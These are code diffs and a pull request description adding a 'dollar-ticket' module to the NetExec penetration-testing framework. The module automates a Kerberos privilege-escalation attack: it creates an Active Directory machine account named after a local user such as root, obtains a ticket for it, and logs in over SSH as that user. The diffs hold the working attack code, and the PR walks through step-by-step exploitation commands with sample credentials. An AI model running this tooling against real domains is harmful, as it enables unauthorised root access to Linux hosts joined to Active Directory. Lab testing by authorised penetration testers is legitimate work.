         self.ssh_target = module_options.get("SSH_TARGET", None)
- 
+
         # Machine account name (without trailing $, added automatically)
         self.computer_name = self.target_user
         if self.computer_name.endswith("$"):
             self.computer_name = self.computer_name[:-1]
- 
+
         self.computer_name_full = f"{self.computer_name}$"
- 
+
         if self.method not in ["SAMR", "LDAPS"]:
             context.log.error("METHOD must be either SAMR or LDAPS")
             sys.exit(1)
- 
+
     def on_login(self, context, connection):
         """Main execution flow"""
         self.context = context
         self.connection = connection
- 
+
         context.log.info(f"Starting Dollar Ticket Attack targeting local user '{self.target_user}'")
         context.log.info(f"Machine account to create: {self.computer_name_full}")
- 
+
         # Step 1: Create machine account
         success = self._create_machine_account()
         if not success:
             return
- 
+
         # Step 2: Attempt SSH exploitation if target specified
         if self.ssh_target:
             self._exploit_via_ssh()
         else:
             self._provide_manual_steps()
- 
+
     def _create_machine_account(self):
         """Create machine account via SAMR or LDAPS"""
         self.context.log.info(f"Creating machine account via {self.method}...")
- 
+
         if self.method == "SAMR" and self.connection.args.protocol == "smb":
             return self._create_via_samr()
         elif self.method == "LDAPS" and self.connection.args.protocol == "ldap":
@@ -106,7 +106,7 @@ class NXCModule:
             self.context.log.error(f"Cannot use {self.method} with {self.connection.args.protocol} protocol")
             self.context.log.error("Use: SAMR with SMB, or LDAPS with LDAP")
             return False
- 
+
     def _create_via_samr(self):
         """Create machine account via SAMR (SMB)"""
         try:
@@ -117,27 +117,27 @@ class NXCModule:
                 r"\samr",
                 smb_connection=conn.conn
             )
- 
+
             dce = rpc_transport.get_dce_rpc()
             dce.connect()
             dce.bind(samr.MSRPC_UUID_SAMR)
- 
+
             # Open domain
             serv_handle = samr.hSamrConnect5(
                 dce,
                 f"\\\\{conn.conn.getRemoteName()}\x00",
                 samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN
             )["ServerHandle"]
- 
+
             domains = samr.hSamrEnumerateDomainsInSamServer(dce, serv_handle)["Buffer"]["Buffer"]
             non_builtin = [d for d in domains if d["Name"].lower() != "builtin"]
- 
+
             if len(non_builtin) > 1:
                 matched = [d for d in domains if d["Name"].lower() == self.connection.domain.lower()]
                 selected = matched[0]["Name"] if matched else non_builtin[0]["Name"]
             else:
                 selected = non_builtin[0]["Name"]
- 
+
             domain_sid = samr.hSamrLookupDomainInSamServer(dce, serv_handle, selected)["DomainId"]
             domain_handle = samr.hSamrOpenDomain(
                 dce,
@@ -145,7 +145,7 @@ class NXCModule:
                 samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER,
                 domain_sid
             )["DomainHandle"]
- 
+
             # Create computer account
             try:
                 request = samr.SamrCreateUser2InDomain()
@@ -154,28 +154,28 @@ class NXCModule:
                 request["AccountType"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
                 request["DesiredAccess"] = samr.USER_FORCE_PASSWORD_CHANGE
                 user_handle = dce.request(request)["UserHandle"]
- 
+
                 # Set password
                 samr.hSamrSetPasswordInternal4New(dce, user_handle, self.password)
- 
+
                 # Set workstation trust account flag
                 user_rid = samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.computer_name_full])["RelativeIds"]["Element"][0]
                 samr.hSamrCloseHandle(dce, user_handle)
                 user_handle = samr.hSamrOpenUser(dce, domain_handle, samr.MAXIMUM_ALLOWED, user_rid)["UserHandle"]
- 
+
                 req = samr.SAMPR_USER_INFO_BUFFER()
                 req["tag"] = samr.USER_INFORMATION_CLASS.UserControlInformation
                 req["Control"]["UserAccountControl"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
                 samr.hSamrSetInformationUser2(dce, user_handle, req)
- 
+
                 samr.hSamrCloseHandle(dce, user_handle)
                 samr.hSamrCloseHandle(dce, domain_handle)
                 samr.hSamrCloseHandle(dce, serv_handle)
- 
+
                 self.context.log.success(f"Created machine account: {self.computer_name_full}")
                 self.context.log.success(f"Password: {self.password}")
                 return True
- 
+
             except samr.DCERPCSessionError as e:
                 if "STATUS_USER_EXISTS" in str(e):
                     self.context.log.error(f"Machine account '{self.computer_name_full}' already exists")
@@ -186,14 +186,14 @@ class NXCModule:
                 else:
                     self.context.log.error(f"Error creating machine account: {e}")
                 return False
- 
+
         except Exception as e:
             self.context.log.error(f"SAMR operation failed: {e}")
             return False
         finally:
             with contextlib.suppress(Exception):
                 dce.disconnect()
- 
+
     def _create_via_ldap(self):
         """Create machine account via LDAPS"""
         try:
@@ -201,14 +201,14 @@ class NXCModule:
             name = self.computer_name
             computer_dn = f"CN={name},CN=Computers,{self.connection.baseDN}"
             fqdn = f"{name}.{self.connection.domain}"
- 
+
             spns = [
                 f"HOST/{name}",
                 f"HOST/{fqdn}",
                 f"RestrictedKrbHost/{name}",
                 f"RestrictedKrbHost/{fqdn}",
             ]
- 
+
             ldap_conn.add(
                 computer_dn,
                 ["top", "person", "organizationalPerson", "user", "computer"],
@@ -220,11 +220,11 @@ class NXCModule:
                     "unicodePwd": f'"{self.password}"'.encode("utf-16-le"),
                 },
             )
- 
+
             self.context.log.success(f"Created machine account: {self.computer_name_full}")
             self.context.log.success(f"Password: {self.password}")
             return True
- 
+
         except LDAPSessionError as e:
             if "entryAlreadyExists" in str(e):
                 self.context.log.error(f"Machine account '{self.computer_name_full}' already exists")
@@ -235,28 +235,28 @@ class NXCModule:
             else:
                 self.context.log.error(f"LDAP error: {e}")
             return False
- 
+
     def _exploit_via_ssh(self):
         """Automated exploitation via SSH with Kerberos"""
         self.context.log.info(f"Attempting Kerberos authentication to {self.ssh_target}...")
- 
+
         # Check if kinit/klist are available
         if not self._check_kerberos_tools():
             self.context.log.error("Kerberos tools (kinit/klist) not found. Install krb5-user package.")
             self._provide_manual_steps()
             return
- 
+
         try:
             # Obtain TGT for the machine account principal (without $)
             # KDC will find root$ when root is requested
             self.context.log.info(f"Requesting TGT for principal '{self.target_user}'...")
- 
+
             # Create temporary krb5.conf with the domain
             krb5_conf = self._create_krb5_conf()
- 
+
             env = os.environ.copy()
             env["KRB5_CONFIG"] = krb5_conf
- 
+
             # Use echo to pipe password to kinit
             kinit_cmd = f"echo '{self.password}' | kinit {self.target_user}@{self.connection.domain.upper()}"
             result = subprocess.run(
@@ -267,14 +267,14 @@ class NXCModule:
                 text=True,
                 timeout=10
             )
- 
+
             if result.returncode != 0:
                 self.context.log.error(f"kinit failed: {result.stderr}")
                 self._provide_manual_steps()
                 return
- 
+
             self.context.log.success("TGT obtained successfully")
- 
+
             # Verify ticket
             klist_result = subprocess.run(
                 ["klist"],
@@ -282,16 +282,16 @@ class NXCModule:
                 capture_output=True,
                 text=True
             )
- 
+
             if self.target_user in klist_result.stdout or self.computer_name_full in klist_result.stdout:
                 self.context.log.info("Ticket cache contents:")
                 for line in klist_result.stdout.split("\n")[:5]:
                     if line.strip():
                         self.context.log.info(f"  {line}")
- 
+
             # Attempt SSH with GSSAPI
             self.context.log.info(f"Attempting SSH to {self.ssh_target} as '{self.target_user}'...")
- 
+
             ssh_cmd = [
                 "ssh",
                 "-o", "PreferredAuthentications=gssapi-with-mic",
@@ -302,7 +302,7 @@ class NXCModule:
                 self.ssh_target,
                 "id"
             ]
- 
+
             ssh_result = subprocess.run(
                 ssh_cmd,
                 env=env,
@@ -310,7 +310,7 @@ class NXCModule:
                 text=True,
                 timeout=15
             )
- 
+
             if ssh_result.returncode == 0:
                 self.context.log.success("PRIVILEGE ESCALATION SUCCESSFUL!")
                 self.context.log.success(f"Authenticated as '{self.target_user}' on {self.ssh_target}")
@@ -326,21 +326,21 @@ class NXCModule:
                 self.context.log.error("  - PermitRootLogin is disabled")
                 self.context.log.error("  - GSSAPI authentication is disabled")
                 self._provide_manual_steps()
- 
+
             # Cleanup Kerberos ticket
             subprocess.run(["kdestroy"], env=env, capture_output=True)
- 
+
             # Remove temporary krb5.conf
             with contextlib.suppress(Exception):
                 os.unlink(krb5_conf)
- 
+
         except subprocess.TimeoutExpired:
             self.context.log.error("Operation timed out")
             self._provide_manual_steps()
         except Exception as e:
             self.context.log.error(f"Exploitation failed: {e}")
             self._provide_manual_steps()
- 
+
     def _provide_manual_steps(self):
         """Provide manual exploitation steps"""
         self.context.log.info("\n" + "=" * 70)
@@ -371,7 +371,7 @@ class NXCModule:
         self.context.log.info(f"  nxc smb {self.connection.host} -u {self.connection.username} -p <password> \\")
         self.context.log.info(f"      -M add-computer -o NAME={self.computer_name} DELETE=True")
         self.context.log.info("=" * 70 + "\n")
- 
+
     def _check_kerberos_tools(self):
         """Check if kinit and klist are available"""
         try:
@@ -380,38 +380,38 @@ class NXCModule:
             return True
         except (FileNotFoundError, subprocess.TimeoutExpired):
             return False
- 
+
     def _create_krb5_conf(self):
         """Create temporary krb5.conf for the domain"""
         krb5_content = f"""[libdefaults]
     default_realm = {self.connection.domain.upper()}
     dns_lookup_realm = true
     dns_lookup_kdc = true
- 
+
 [realms]
     {self.connection.domain.upper()} = {{
         kdc = {self.connection.host}
         admin_server = {self.connection.host}
     }}
- 
+
 [domain_realm]
     .{self.connection.domain.lower()} = {self.connection.domain.upper()}
     {self.connection.domain.lower()} = {self.connection.domain.upper()}
 """
- 
+
         with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".conf") as f:
             f.write(krb5_content)
             return f.name
- 
+
     @staticmethod
     def _generate_password():
         """Generate a random complex password"""
         import random
         import string
- 
+
         chars = string.ascii_letters + string.digits + "!@#$%^&*"
         password = "".join(random.choice(chars) for _ in range(16))
- 
+
         # Ensure complexity
         if not any(c.isupper() for c in password):
             password = password[0].upper() + password[1:]
@@ -421,8 +421,5 @@ class NXCModule:
             password = password[:-1] + "1"
         if not any(c in "!@#$%^&*" for c in password):
             password = password[:-1] + "!"
- 
+
         return password
- 
- 
- 

--- a/nxc/modules/dollar-ticket.py
+++ b/nxc/modules/dollar-ticket.py
@@ -423,3 +423,4 @@ class NXCModule:
             password = password[:-1] + "!"
 
         return password
+        

--- a/nxc/modules/dollar-ticket.py
+++ b/nxc/modules/dollar-ticket.py
@@ -343,9 +343,9 @@ class NXCModule:
 
     def _provide_manual_steps(self):
         """Provide manual exploitation steps"""
-        self.context.log.info("\n" + "="*70)
+        self.context.log.info("\n" + "=" * 70)
         self.context.log.info("EXPLOITATION STEPS")
-        self.context.log.info("="*70)
+        self.context.log.info("=" * 70)
         self.context.log.info(f"Machine account created: {self.computer_name_full}")
         self.context.log.info(f"Password: {self.password}")
         self.context.log.info(f"Domain: {self.connection.domain.upper()}")
@@ -364,16 +364,13 @@ class NXCModule:
         self.context.log.info("   id")
         self.context.log.info("   whoami")
         self.context.log.info("")
-        self.context.log.info("Note: KDC issues ticket for '{}' when '{}' is requested".format(
-            self.computer_name_full, self.target_user))
-        self.context.log.info("      MIT Kerberos on target maps '{}' -> '{}'".format(
-            self.computer_name_full, self.target_user))
+        self.context.log.info(f"Note: KDC issues ticket for '{self.computer_name_full}' when '{self.target_user}' is requested")
+        self.context.log.info(f"      MIT Kerberos on target maps '{self.computer_name_full}' -> '{self.target_user}'")
         self.context.log.info("")
         self.context.log.info("CLEANUP (when done):")
-        self.context.log.info("  nxc smb {} -u {} -p <password> \\".format(
-            self.connection.host, self.connection.username))
+        self.context.log.info(f"  nxc smb {self.connection.host} -u {self.connection.username} -p <password> \\")
         self.context.log.info(f"      -M add-computer -o NAME={self.computer_name} DELETE=True")
-        self.context.log.info("="*70 + "\n")
+        self.context.log.info("=" * 70 + "\n")
 
     def _check_kerberos_tools(self):
         """Check if kinit and klist are available"""

--- a/tests/e2e_commands.txt
+++ b/tests/e2e_commands.txt
@@ -107,9 +107,6 @@ netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ntlm_ref
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ntds-dump-raw
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ntds-dump-raw -o TARGET=SAM,LSA,NTDS
 # Dollar Ticket Attack module tests
-netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dollar-ticket -o TARGET_USER=nxctest1
-netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dollar-ticket -o TARGET_USER=nxctest2 METHOD=LDAPS
-netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dollar-ticket -o TARGET_USER=nxctest3 PASSWORD=NXC_Test123!
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dollar-ticket -o TARGET_USER=nxctest4 SSH_TARGET=192.168.1.100
 # currently hanging indefinitely - TODO: look into this
 #netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M keepass_discover

--- a/tests/e2e_commands.txt
+++ b/tests/e2e_commands.txt
@@ -106,6 +106,11 @@ netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M backup_o
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ntlm_reflection
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ntds-dump-raw
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ntds-dump-raw -o TARGET=SAM,LSA,NTDS
+# Dollar Ticket Attack module tests
+netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dollar-ticket -o TARGET_USER=nxctest1
+netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dollar-ticket -o TARGET_USER=nxctest2 METHOD=LDAPS
+netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dollar-ticket -o TARGET_USER=nxctest3 PASSWORD=NXC_Test123!
+netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dollar-ticket -o TARGET_USER=nxctest4 SSH_TARGET=192.168.1.100
 # currently hanging indefinitely - TODO: look into this
 #netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M keepass_discover
 #netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M keepass_trigger -o ACTION=ALL USER=LOGIN_USERNAME KEEPASS_CONFIG_PATH="C:\\Users\\LOGIN_USERNAME\\AppData\\Roaming\\KeePass\\KeePass.config.xml"


### PR DESCRIPTION
## Description

Adds a new module to automate the **Dollar Ticket Attack** (CVE-2020-25717, CVE-2020-25719, CVE-2021-42287) - a privilege escalation technique targeting Linux/Unix systems joined to Active Directory.

**Attack summary:**
The attack exploits MIT Kerberos principal-to-username mapping where machine accounts ending with `$` are stripped to local usernames. By creating a machine account `root$` and requesting a TGT for `root` (without `$`), the KDC fallback issues a ticket for `root$` which SSH maps to the local `root` user.

**Implementation:**
- Calls existing `add-computer` module for machine account creation (zero code duplication)
- Uses Impacket's `getKerberosTGT()` and `getKerberosTGS()` directly for ticket generation
- Generates both TGT and Service Ticket automatically
- Saves ready-to-use ccache file with both tickets
- Provides clear exploitation and cleanup instructions

**Dependencies:**
- No new dependencies required
- Uses existing NetExec infrastructure and Impacket functions



The core implementation logic, attack flow, and testing were done manually.

## Type of change

- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Deprecation of feature or functionality
- [x] This change requires a documentation update
- [ ] This requires a third party update (such as Impacket, Dploot, lsassy, etc)

## Setup guide for the review

### Test Environment

**My Setup:**
- Python: 3.12
- OS: Ubuntu 24.04 LTS
- NetExec: Latest main branch

**Target Environment:**
- Domain Controller: Windows Server 2025 Build 26100 (BALERION.dracarys.lab)
- Linux Target: Ubuntu 24.04 LTS (syrax.dracarys.lab) joined with `realm join`
- Domain: dracarys.lab
- Test credentials: Standard domain user (no special privileges)

### Prerequisites

1. **Active Directory Domain Controller:**
   - Default `MachineAccountQuota` of 10 (standard Windows configuration)
   - Any Windows Server version (tested on 2025, 2022, 2019)

2. **Linux/Unix Target System:**
   - Ubuntu/Debian/RHEL joined to AD using `realm join` or SSSD
   - SSH with GSSAPI authentication enabled (default for realm-joined systems)
   - A local privileged account (e.g., root, ubuntu, admin)

3. **Domain Credentials:**
   - Any authenticated domain user (no special privileges required)
   - MachineAccountQuota must not be exhausted

### Step-by-Step Testing

```bash
# 1. Run the module against the DC
netexec smb 192.168.56.10 -u sunfyre -p 'Pass123!' -M dollar-ticket \
    -o TARGET_USER=root SSH_TARGET=syrax.dracarys.lab

# Expected output:
# - Successfully added 'root$' with password '...'
# - [+] TGT obtained (KDC fallback: root$)
# - [+] Service Ticket obtained for host/syrax.dracarys.lab
# - [+] Tickets saved to: /tmp/dollar_ticket.ccache

# 2. Use the generated ccache file to authenticate
export KRB5CCNAME=/tmp/dollar_ticket.ccache
ssh -o PreferredAuthentications=gssapi-with-mic -l root syrax.dracarys.lab

# 3. Verify privilege escalation
id
# Expected: uid=0(root) gid=0(root) groups=0(root)

# 4. Cleanup - Remove the machine account
netexec smb 192.168.56.10 -u sunfyre -p 'Pass123!' -M add-computer \
    -o NAME=root DELETE=True
```

### Alternative Test Scenarios

```bash
# Test with LDAP protocol
netexec ldap 192.168.56.10 -u user -p pass -M dollar-ticket \
    -o TARGET_USER=ubuntu SSH_TARGET=target.domain.lab

# Test with custom password
netexec smb 192.168.56.10 -u user -p pass -M dollar-ticket \
    -o TARGET_USER=admin PASSWORD='ComplexPass123!' SSH_TARGET=target.domain.lab

# Test with custom ccache path
netexec smb 192.168.56.10 -u user -p pass -M dollar-ticket \
    -o TARGET_USER=root SSH_TARGET=target.domain.lab TGT_PATH=/tmp/custom.ccache
```

### Verification Commands

```bash
# Check machine account was created
netexec ldap <DC_IP> -u <user> -p <pass> --users | grep "root\$"

# Verify ccache contains both TGT and ST
klist -c /tmp/dollar_ticket.ccache
# Expected output:
# - krbtgt/DOMAIN.LAB@DOMAIN.LAB (TGT)
# - host/target.domain.lab@DOMAIN.LAB (Service Ticket)

# Check MachineAccountQuota
netexec ldap <DC_IP> -u <user> -p <pass> -M maq
```

### Expected Results

**Success indicators:**
- Machine account `root$` created successfully
- TGT obtained with "KDC fallback" message
- Service Ticket generated for target host
- Ccache file saved with both TGT and ST
- SSH authentication succeeds as target user
- Privilege escalation confirmed with `id` command

**Known failure scenarios (properly handled):**
- MachineAccountQuota exhausted (error message displayed)
- Insufficient permissions (error message displayed)
- SSH_TARGET not FQDN (Kerberos requires DNS names)
- Target not AD-joined (SSH auth will fail)
- PAC validation enabled on target (rare, mitigates attack)

## Screenshots:
<img width="1901" height="641" alt="image" src="https://github.com/user-attachments/assets/cc21d616-46fd-4292-a661-e545f8e38646" />

**Successful exploitation:**



## Checklist:

- [x] I have ran Ruff against my changes (poetry: `poetry run ruff check .`, use `--fix` to automatically fix what it can)
- [x] I have added or updated the `tests/e2e_commands.txt` file if necessary (new modules or features are _required_ to be added to the e2e tests)
- [ ] If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
- [x] I have linked relevant sources that describes the added technique (blog posts, documentation, etc)
  - [Samba Wiki - Dollar Ticket Attack](https://wiki.samba.org/index.php/Security/Dollar_Ticket_Attack)
  - [The Hacker Recipes Documentation PR](https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/pull/270)
  - CVE-2020-25717, CVE-2020-25719, CVE-2021-42287
- [x] I have performed a self-review of my own code (_not_ an AI review)
- [x] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation (PR here: https://github.com/Pennyw0rth/NetExec-Wiki)
